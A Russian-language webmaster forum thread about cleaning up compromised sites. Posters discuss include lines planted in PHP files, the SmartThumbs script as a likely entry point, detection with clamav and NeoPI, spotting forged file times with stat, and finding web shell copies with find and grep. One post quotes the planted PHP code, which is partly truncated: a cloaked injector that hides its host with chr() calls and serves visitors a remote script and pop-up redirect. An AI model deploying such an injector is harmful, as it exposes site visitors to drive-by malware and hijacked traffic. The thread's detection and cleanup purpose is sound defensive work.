Как найти вебшелл ?

обнаружил на некоторых своих сайтах странный инклуд и резкое падение трафа

$qi='/tmp/.ICE-unix/w';@include_once($qi);
и
$qi='/tmp/.ICE-unix/w';@include($qi);

в самом файле вот такой код

Код:

<?php $qout=($qout)?$qout:'(/out.php|/st/st.php|/scj/cgi/out.php|/dtr/link.php)'; if(!$_COOKIE['qc'] && ((!$_SERVER['HTTP_X_REAL_IP'] && preg_match("%keep-alive%i", $_SERVER['HTTP_CONNECTION'])) || $_SERVER['HTTP_X_REAL_IP']) && $_SERVER['HTTP_USER_AGENT'] && !preg_match("%bot%i",$_SERVER['HTTP_USER_AGENT']) && preg_match("%(msie|chrome|firefox)%i",$_SERVER['HTTP_USER_AGENT']) && $_SERVER['HTTP error_reporting(0);$qd=chr(120).chr(116).chr(119).chr(120).chr(116).chr(46).chr(99).chr(111).chr(109); if($qi && $_SERVER['HTTP_REFERER'] && !preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER'])){echo "<script src='http://{$qd}/'></script>";} elseif (is_array($_COOKIE) && $_SERVER['HTTP_REFERER'] && preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER']) && preg_match("%$qout%i", $_SERVER['SCRIPT_NAME'])){header("Set-Cookie: qc=1; path=/; expires=". gmdate('D, d-M-Y H:i:s', time()+604800) ." GMT;");echo "<html><body><script>var wo=window.ope } ?>

подскажите как найти сам шелл через который заливают эту дрянь ?

самое интересное что дата последнего изминения php файла куда вставляется инклуд - не меняется

А я писал недвано об этом. Smart Thumbs - снова старая песня. Проверяем.
Почти никто не обратил внимание. Но своих трейдеров я предупредил в месенджерах.

S_Flash: спасибо за линк. Смарт тумбса и смарт сж не было, но я уже походу догадался как и что, я перенес домен один пару дней назад с сервера где был смарт тумбс и смартсж, и вот перенес уже с вебшелом (нашел кстати его)

расскажи как нашел?

clamav ищет нормально и NeoPI

xDiver писал:

самое интересное что дата последнего изминения php файла куда вставляется инклуд - не меняется

Время изменения файла можно подделать с помощью команды touch. На фре stat -x filename нужно смотреть поле Change, его подделать нельзя, на линуксятине просто stat filename.

Pika писал:

clamav ищет нормально и NeoPI

можно попроще?
я только ubuntu трогаю еще

Последний раз редактировалось: raider (10/11/13 в 15:33), всего редактировалось 1 раз

man clamcheck

нашел банально !! начал смотреть подозрительные файлы на фтп, но сам понимал что маловероятно что сходу что-то замечу. Но мне повезло, нашел в папке /images пхп файл, а я никогда и нигде в имеджи исполняющии файлы не клал - это и привлекло сразу мое внимание. Потом просто вязл кусок закодированного в base64 кода и командой

Код:

find /home/sites/ -name \*.php -type f -exec grep -l "кусок кода" {} \;

прошелся в хоум дире и нашел копии вебшела

потом еще так же прошелся на предмет инклуда вебшела, у меня вот такие варианты были:

Код:

$qi='/tmp/.ICE-unix/t';@include($qi); @$f='/tmp/cache';if(is_file($f))require($f); $qi='/tmp/.ICE-unix/t';@include_once($qi);

на некоторых сайтах очень давно стоял код как мне кажется ..

Я зашёл на свои сайты, которым уже по 10 лет или больше на SmartThumbs, где нет даже банерной рекламы ифреймовой и тут каспер говорит, что есть попытка открыть вредоносный урл. Дебаггер и хедеры сразу подлсказали, где копать. Воторой заход с этого же браузере\IP уже не палилися.
Админы просканили сервер и /st/admin/variables.php как всегда отличился. Но судя по содержимому гадости, там заготовка не только для ST: Smart Thumbs - снова старая песня. Проверяем.